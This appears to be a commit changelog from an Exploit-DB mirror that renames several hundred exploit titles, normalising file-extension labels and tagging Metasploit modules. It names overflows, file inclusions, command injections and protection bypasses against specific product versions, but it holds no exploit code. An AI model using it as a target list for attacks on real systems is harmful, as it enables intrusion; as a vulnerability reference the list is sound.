exploit-db-mirror/platforms/python/remote/40170.rb
Offensive Security 70d97f91c1 DB: 2016-07-28
2 new exploits

Multiple AntiVirus (zip file) Detection Bypass Exploit
Multiple AntiVirus - .zip Detection Bypass Exploit

RealPlayer 10 - (.smil File) Local Buffer Overflow Exploit
RealPlayer 10 - (.smil) Local Buffer Overflow Exploit

Veritas Backup Exec - Remote File Access Exploit (Windows)
Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)
ZENworks 6.5 Desktop/Server Management Remote Stack Overflow
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow
ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit)
MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow Exploit (Metasploit)
Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)

WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit
WebAdmin <= 2.0.4 - USER Buffer Overflow Exploit (Metasploit)

Opera <= 8.02 - Remote Denial of Service Exploit
Opera <= 8.02 - Remote Denial of Service Exploit (1)
MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit
Google Search Appliance - proxystylesheet XSLT Java Code Execution
MailEnable 1.54 Pro - Universal IMAPD W3C Logging BoF Exploit (Metasploit)
Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit
Lyris ListManager - Read Message Attachment SQL Injection Exploit
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow Exploit (Metasploit)
Lyris ListManager - Read Message Attachment SQL Injection Exploit (Metasploit)

Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux)
Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (Linux) (Metasploit)

Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX)
Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (OSX) (Metasploit)

Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit
Mac OS X Safari Browser - (Safe File) Remote Code Execution Exploit (Metasploit)
Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit
Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow
Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)
Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow (Metasploit)

Microsoft Visual Studio 6.0 sp6 - (Malformed .dbp File) Buffer Overflow Exploit
Microsoft Visual Studio 6.0 sp6 - (.dbp) Buffer Overflow Exploit
Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit
Symantec Sygate Management Server - (login) SQL Injection Exploit
Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit
Novell Messenger Server 2.0 - (Accept-Language) Remote Overflow Exploit (Metasploit)
Symantec Sygate Management Server - (login) SQL Injection Exploit (Metasploit)
Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow Exploit (Metasploit)

Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025)
Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)

Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)
Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit)
eIQnetworks License Manager Remote Buffer Overflow Exploit (1262)
eIQnetworks License Manager Remote Buffer Overflow Exploit (494)
eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)

eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2)
eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) (2)

Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)
Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)

Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)
Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)

IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit
IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)

Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)
Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)

Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit
Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (Metasploit)

McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit
McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)

PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32)
PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) (Metasploit)

Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept
Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept (Metasploit)

VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (Metasploit)
VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit (Metasploit)

VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit
VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit

Windows Media Player 9/10 - (MID File) Denial of Service Exploit
Windows Media Player 9/10 - (.MID) Denial of Service Exploit

NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit
NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit (Metasploit)

Oreon <= 1.2.3 RC4 - (lang/index.php file) Remote Inclusion
Oreon <= 1.2.3 RC4 - (lang/index.php) Remote Inclusion

Magic CMS 4.2.747 - (mysave.php file) Remote File Include
Magic CMS 4.2.747 - (mysave.php) Remote File Include

WebLog (index.php file) Remote File Disclosure
WebLog (index.php) Remote File Disclosure

Pathos CMS 0.92-2 - (warn.php file) Remote File Inclusion
Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion

Zomplog 3.8 - (force_download.php file) Remote File Disclosure
Zomplog 3.8 - (force_download.php) Remote File Disclosure

Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit
Winamp <= 5.3 - (.WMV) Remote Denial of Service Exploit

Opera 9.2 - (torrent File) Remote Denial of Service Exploit
Opera 9.2 - (.torrent) Remote Denial of Service Exploit

JulmaCMS 1.4 - (file.php file) Remote File Disclosure
JulmaCMS 1.4 - (file.php) Remote File Disclosure

PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure
PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure
Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit
OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit
Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit
OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit

AtomixMP3 2.3 - (pls File) Local Buffer OverFlow Exploit
AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit

helplink 0.1.0 - (show.php file) Remote File Inclusion
helplink 0.1.0 - (show.php) Remote File Inclusion

jetAudio 7.x - (m3u File) Local SEH Overwrite Exploit
jetAudio 7.x - (m3u) Local SEH Overwrite Exploit

FireConfig 0.5 - (dl.php file) Remote File Disclosure
FireConfig 0.5 - (dl.php) Remote File Disclosure

Sony CONNECT Player 4.x - (m3u File) Local Stack Overflow Exploit
Sony CONNECT Player 4.x - (.m3u) Local Stack Overflow Exploit

phpCMS 1.2.2 - (parser.php file) Remote File Disclosure
phpCMS 1.2.2 - (parser.php) Remote File Disclosure

ChartDirector 4.1 - (viewsource.php file) File Disclosure
ChartDirector 4.1 - (viewsource.php) File Disclosure

IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)
IntelliTamper 2.07 - (.map) Local Arbitrary Code Execution Exploit (Perl)

Acoustica Mixcraft <= 4.2 Build 98 - (mx4 file) Local BoF Exploit
Acoustica Mixcraft <= 4.2 Build 98 - (mx4) Local BoF Exploit

Acoustica MP3 CD Burner 4.51 Build 147 - (asx file) Local BoF Exploit
Acoustica MP3 CD Burner 4.51 Build 147 - (.asx) Local BoF Exploit

Acoustica Beatcraft 1.02 Build 19 - (bcproj file) Local BoF Exploit
Acoustica Beatcraft 1.02 Build 19 - (.bcproj) Local BoF Exploit

Microsoft Windows Explorer - (.zip File) Denial of Service Exploit
Microsoft Windows Explorer - (.zip) Denial of Service Exploit

Kusaba <= 1.0.4 - Remote Code Execution Exploit
Kusaba <= 1.0.4 - Remote Code Execution Exploit (1)

Cain & Abel 4.9.23 - (rdp file) Buffer Overflow PoC
Cain & Abel 4.9.23 - (.rdp) Buffer Overflow PoC

Electronics Workbench (EWB File) Local Stack Overflow PoC
Electronics Workbench (.EWB) Local Stack Overflow PoC

Cain & Abel 4.9.23 - (rdp file) Buffer Overflow Exploit
Cain & Abel 4.9.23 - (.rdp) Buffer Overflow Exploit

autositephp 2.0.3 - (LFI/CSRF/edit file) Multiple Vulnerabilities
autositephp 2.0.3 - (LFI/CSRF/Edit file) Multiple Vulnerabilities

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit
CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit

CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python)
CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)

SAWStudio 3.9i (prf File) Local Buffer Overflow PoC
SAWStudio 3.9i - (.prf) Local Buffer Overflow PoC

IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit
IntelliTamper 2.07/2.08 - (.MAP) Local SEH Overwrite Exploit

Hex Workshop 5.1.4 - (Color Mapping File) Local Buffer Overflow PoC
Hex Workshop 5.1.4 - Color Mapping File Local Buffer Overflow PoC

Destiny Media Player 1.61 - (lst File) Local Buffer Overflow PoC
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow PoC
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (2)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (3)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (2)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (3)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (4)
Destiny Media Player 1.61 - (lst File) Local Buffer Overflow Exploit (5)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (4)
Destiny Media Player 1.61 - (.lst) Local Buffer Overflow Exploit (5)

VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.pls) Universal Buffer Overflow Exploit

ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit
ExcelOCX ActiveX 3.2 - Download File Insecure Method Exploit
Zinf Audio Player 2.2.1 - (PLS File) Stack Overflow PoC
Zinf Audio Player 2.2.1 - (PLS File) Local Buffer Overflow Exploit (univ)
Zinf Audio Player 2.2.1 - (M3U FILE) Local Heap Overflow PoC
Zinf Audio Player 2.2.1 - (gqmpeg File) Buffer Overflow PoC
Zinf Audio Player 2.2.1 - (.pls) Stack Overflow PoC
Zinf Audio Player 2.2.1 - (.pls) Local Buffer Overflow Exploit (univ)
Zinf Audio Player 2.2.1 - (.M3U) Local Heap Overflow PoC
Zinf Audio Player 2.2.1 - (.gqmpeg) Buffer Overflow PoC

Thomson mp3PRO Player/Encoder (M3U File) Crash PoC
Thomson mp3PRO Player/Encoder - (.M3U) Crash PoC

Spider Player 2.3.9.5 - (asx File) off by one Crash Exploit
Spider Player 2.3.9.5 - (.asx) off by one Crash Exploit

Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC
Elecard AVC HD PLAYER - (.m3u/.xpl) Local Stack Overflow PoC

Nokia N95-8 - (.JPG File) Remote Crash PoC
Nokia N95-8 - (.JPG) Remote Crash PoC

Media Commands (m3u File) Local SEH Overwrite Exploit
Media Commands (.m3u) Local SEH Overwrite Exploit

Media Commands (m3u File) Universal SEH Overwrite Exploit
Media Commands (.m3u) Universal SEH Overwrite Exploit

MediaCoder 0.6.2.4275 - (m3u File) Universal Stack Overflow Exploit
MediaCoder 0.6.2.4275 - (.m3u) Universal Stack Overflow Exploit

VUPlayer <= 2.49 - (.cue) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.cue) Universal Buffer Overflow Exploit

Gretech GOM Encoder 1.0.0.11 - (Subtitle File) Buffer Overflow PoC
Gretech GOM Encoder 1.0.0.11 - (.Subtitle) Buffer Overflow PoC
Abee Chm Maker 1.9.5 - (CMP File) Stack Overflow Exploit
PowerCHM 5.7 - (hhp File) Stack Overflow poC
Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit
PowerCHM 5.7 - (.hhp) Stack Overflow poC

Apollo 37zz (M3u File) Local Heap Overflow PoC
Apollo 37zz - (.m3u) Local Heap Overflow PoC

mpegable Player 2.12 - (YUV File) Local Stack Overflow PoC
mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC

Rama CMS <= 0.9.8 - (download.php file) File Disclosure
Rama CMS <= 0.9.8 - (download.php) File Disclosure

compface <= 1.5.2 - (XBM File) Local Buffer Overflow PoC
compface <= 1.5.2 - (.XBM) Local Buffer Overflow PoC

MP3-Nator 2.0 - (plf File) Universal Buffer Overflow Exploit (SEH)
MP3-Nator 2.0 - (.plf) Universal Buffer Overflow Exploit (SEH)

PatPlayer 3.9 - (M3U File) Local Heap Overflow PoC
PatPlayer 3.9 - (.M3U) Local Heap Overflow PoC

QuickDev 4 - (download.php file) File Disclosure
QuickDev 4 - (download.php) File Disclosure

FoxPlayer 1.1.0 - (m3u File) Local Buffer Overflow PoC
FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC

Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit
Microsoft Windows 2003 - (.EOT) BSOD Crash Exploit

VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit

Audio Lib Player (m3u File) Buffer Overflow Exploit (SEH)
Audio Lib Player (.m3u) Buffer Overflow Exploit (SEH)

MP3 Collector 2.3 - (m3u File) Local Crash PoC
MP3 Collector 2.3 - (.m3u) Local Crash PoC

BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC
BigAnt Server 2.50 SP1 - (.ZIP) Local Buffer Overflow PoC

BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)
BigAnt Server <= 2.50 SP6 - (.ZIP) Local Buffer Overflow PoC (2)

XM Easy Personal FTP Server <= 5.8.0 DoS
XM Easy Personal FTP Server <= 5.8.0 DoS (Metasploit)

Symantec ConsoleUtilities ActiveX Buffer Overflow
Symantec ConsoleUtilities ActiveX Buffer Overflow (Metasploit)

Nagios3 statuswml.cgi Command Injection
Nagios3 statuswml.cgi Command Injection (Metasploit)

httpdx 1.4 - h_handlepeer BoF
httpdx 1.4 - h_handlepeer BoF (Metasploit)

Mambo 4.6.4 - Cache Lite Output Remote File Inclusion
Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)
BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion
AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection
Cacti 0.8.6-d graph_view.php Command Injection
AWStats 6.2-6.1 - configdir Command Injection
ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution
SpamAssassin spamd <= 3.1.3 - Command Injection
DistCC Daemon - Command Execution
ContentKeeper Web Appliance < 125.10 Command Execution
Solaris in.telnetd TTYPROMPT - Buffer Overflow
Solaris 10 / 11 Telnet - Remote Authentication Bypass
Solaris sadmind adm_build_path - Buffer Overflow
Solaris <= 8.0 - LPD Command Execution
BASE <= 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)
AWStats 6.4-6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
Cacti 0.8.6-d graph_view.php Command Injection (Metasploit)
AWStats 6.2-6.1 - configdir Command Injection (Metasploit)
ClamAV Milter <= 0.92.2 - Blackhole-Mode (sendmail) Code Execution (Metasploit)
SpamAssassin spamd <= 3.1.3 - Command Injection (Metasploit)
DistCC Daemon - Command Execution (Metasploit)
ContentKeeper Web Appliance < 125.10 Command Execution (Metasploit)
Solaris in.telnetd TTYPROMPT - Buffer Overflow (Metasploit)
Solaris 10 / 11 Telnet - Remote Authentication Bypass (Metasploit)
Solaris sadmind adm_build_path - Buffer Overflow (Metasploit)
Solaris <= 8.0 - LPD Command Execution (Metasploit)
Solaris 8 dtspcd - Heap Overflow
Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X)
Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X)
Solaris 8 dtspcd - Heap Overflow (Metasploit)
Samba 2.2.0 < 2.2.8 - trans2open Overflow (OS X) (Metasploit)
Apple Quicktime RTSP 10.4.0 - 10.5.0 Content-Type Overflow (OS X) (Metasploit)
mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X)
WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X)
Mail.App 10.5.0 - Image Attachment Command Execution (OS X)
Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X)
AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X)
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow
mDNSResponder 10.4.0 / 10.4.8 - UPnP Location Overflow (OS X) (Metasploit)
WebSTAR FTP Server <= 5.3.2 - USER Overflow (OS X) (Metasploit)
Mail.App 10.5.0 - Image Attachment Command Execution (OS X) (Metasploit)
Arkeia Backup Client <= 5.3.3 - Type 77 Overflow (OS X) (Metasploit)
AppleFileServer 10.3.3 - LoginEXT PathName Overflow (OS X) (Metasploit)
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)
Wyse Rapport Hagent Fake Hserver - Command Execution
Subversion 1.0.2 - Date Overflow
Samba 2.2.x - nttrans Overflow
RealServer 7-9 Describe Buffer Overflow
PHP < 4.5.0 - unserialize Overflow
ntpd 4.0.99j-k readvar - Buffer Overflow
Veritas NetBackup - Remote Command Execution
HP OpenView OmniBack II A.03.50 - Command Executino
Apple Quicktime for Java 7 - Memory Access
Opera 9.50 / 9.61 historysearch - Command Execution
Opera <= 9.10 Configuration Overwrite
Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution
Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution
Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit
Firefox 3.5 - escape Memory Corruption Exploit
Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow
Squid 2.5.x / 3.x - NTLM Buffer Overflow
Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow
MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow
Borland InterBase 2007 - PWD_db_aliased Buffer Overflow
Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)
Subversion 1.0.2 - Date Overflow (Metasploit)
Samba 2.2.x - nttrans Overflow (Metasploit)
RealServer 7-9 Describe Buffer Overflow (Metasploit)
PHP < 4.5.0 - unserialize Overflow (Metasploit)
ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit)
Veritas NetBackup - Remote Command Execution (Metasploit)
HP OpenView OmniBack II A.03.50 - Command Execution (Metasploit)
Apple Quicktime for Java 7 - Memory Access (Metasploit)
Opera 9.50 / 9.61 historysearch - Command Execution (Metasploit)
Opera <= 9.10 Configuration Overwrite (Metasploit)
Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)
Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)
Sun Java Runtime and Development Kit <= 6 Update 10 - Calendar Deserialization Exploit (Metasploit)
Firefox 3.5 - escape Memory Corruption Exploit (Metasploit)
Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)
Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)
Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)
MySQL <= 6.0 yaSSL <= 1.7.5 - Hello Message Buffer Overflow (Metasploit)
Borland InterBase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)

HP Release Control Authenticated XXE
HP Release Control Authenticated XXE (Metasploit)
Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow
Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow
Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)
Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)
Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow
Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow
University of Washington - imap LSUB Buffer Overflow
Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit
PeerCast <= 0.1216
Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow
Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)
University of Washington - imap LSUB Buffer Overflow (Metasploit)
Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)
PeerCast <= 0.1216 (Metasploit)
Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)
Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection
Unreal Tournament 2004 - 'Secure' Overflow
Irix LPD tagprinter - Command Execution
HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution
Xtacacsd <= 4.1.2 - report Buffer Overflow
System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)
Mercantec SoftCart 4.00b - CGI Overflow
Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection (Metasploit)
Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)
Irix LPD tagprinter - Command Execution (Metasploit)
HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)
Xtacacsd <= 4.1.2 - report Buffer Overflow (Metasploit)
System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (Metasploit)
Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)

Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution
Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution (Metasploit)
M3U To ASX-WPL 1.1 - (m3u Playlist file) Buffer Overflow Exploit
HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit
Audacity 1.2.6 - (gro File) Buffer Overflow Exploit
M3U To ASX-WPL 1.1 - (.m3u) Buffer Overflow Exploit
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit
Audacity 1.2.6 - (.gro) Buffer Overflow Exploit

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (Metasploit)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (Metasploit)

Millenium MP3 Studio 2.0 - (PLS File) Universal Stack Overflow (Metasploit)
Millenium MP3 Studio 2.0 - (.pls) Universal Stack Overflow (Metasploit)

Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (1)
Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (Metasploit) (1)

Audiotran 1.4.1 - (PLS File) Stack Overflow (Metasploit)
Audiotran 1.4.1 - (.pls) Stack Overflow (Metasploit)

OpenOffice - (.slk File) Parsing Null Pointer
OpenOffice - (.slk) Parsing Null Pointer

MediaCoder - (.lst file) Local Buffer Overflow Exploit
MediaCoder - (.lst) Local Buffer Overflow Exploit

VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)
VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)

ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass)
ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS DEP and ASLR Bypass) (Metasploit)

Mediacoder 0.7.3.4682 - (.m3u File) Universal Buffer Overflow Exploit
Mediacoder 0.7.3.4682 - (.m3u) Universal Buffer Overflow Exploit

Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass
Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)

Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit
Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit (Metasploit)

VUPlayer - M3U Buffer Overflow
VUPlayer - (.m3u) Buffer Overflow (Metasploit)

Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow
Audiotran 1.4.1 - (.pls) Stack Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (1)

Millenium MP3 Studio 2.0 - (PLS File) Stack Buffer Overflow
Millenium MP3 Studio 2.0 - (.pls) Stack Buffer Overflow

VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
VariCAD 2010-2.05 EN - (.DWB) Stack Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (2)

ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow
ProShow Gold 4.0.2549 - (.PSH) Stack Buffer Overflow

VUPlayer - CUE Buffer Overflow
VUPlayer - (.cue) Buffer Overflow (Metasploit)

AstonSoft DeepBurner (DBR File) Path Buffer Overflow
AstonSoft DeepBurner - (.DBR) Path Buffer Overflow

HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)
HTML Help Workshop 4.74 - (.hhp) Buffer Overflow Exploit (3)

Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow
Zinf Audio Player 2.2.1 - (.pls) Stack Buffer Overflow

MikeyZip 1.1 - (.zip File) Buffer Overflow
MikeyZip 1.1 - (.zip) Buffer Overflow

Windows - DNS Reverse Download and Exec Shellcode
Windows - DNS Reverse Download and Exec Shellcode (Metasploit)

Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter)
Magix Musik Maker 16 - (.mmm) Stack Buffer Overflow (without egg-hunter) (Metasploit)

Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit
Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit (Metasploit)

If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (2)
If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit  (Metasploit) (2)

Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)
Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053) (Metasploit)

MicroP 0.1.1.1600 - (MPPL File) Stack Buffer Overflow
MicroP 0.1.1.1600 - (.MPPL) Stack Buffer Overflow

Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass)
Firefox 3.6.16 - OBJECT mChannel Remote Code Execution Exploit (DEP Bypass) (Metasploit)
HP JetDirect PJL Interface Universal Path Traversal
HP JetDirect PJL Query Execution
HP JetDirect PJL Interface Universal Path Traversal (Metasploit)
HP JetDirect PJL Query Execution (Metasploit)

Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution
Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution (Metasploit)

LifeSize Room - Command Injection
LifeSize Room - Command Injection (Metasploit)

Opera 10/11 - (bad nesting with frameset tag) Memory Corruption
Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)

Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day)
Opera Browser 10/11/12 - (SVG layout) Memory Corruption (0Day) (Metasploit)

Cytel Studio 9.0 - (CY3 File) Stack Buffer Overflow
Cytel Studio 9.0 - (.CY3) Stack Buffer Overflow

NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
NJStar Communicator 3.00 MiniSMTP Server Remote Exploit (Metasploit)

KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass)
KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass) (Metasploit)

AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST)
AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST) (Metasploit)

QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS
QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)

Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow
Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow

CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u)
CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit (.m3u) (Metasploit)
AVID Media Composer Phonetic Indexer Remote Stack BoF
Final Draft 8 - Multiple Stack Buffer Overflows
AVID Media Composer Phonetic Indexer Remote Stack BoF (Metasploit)
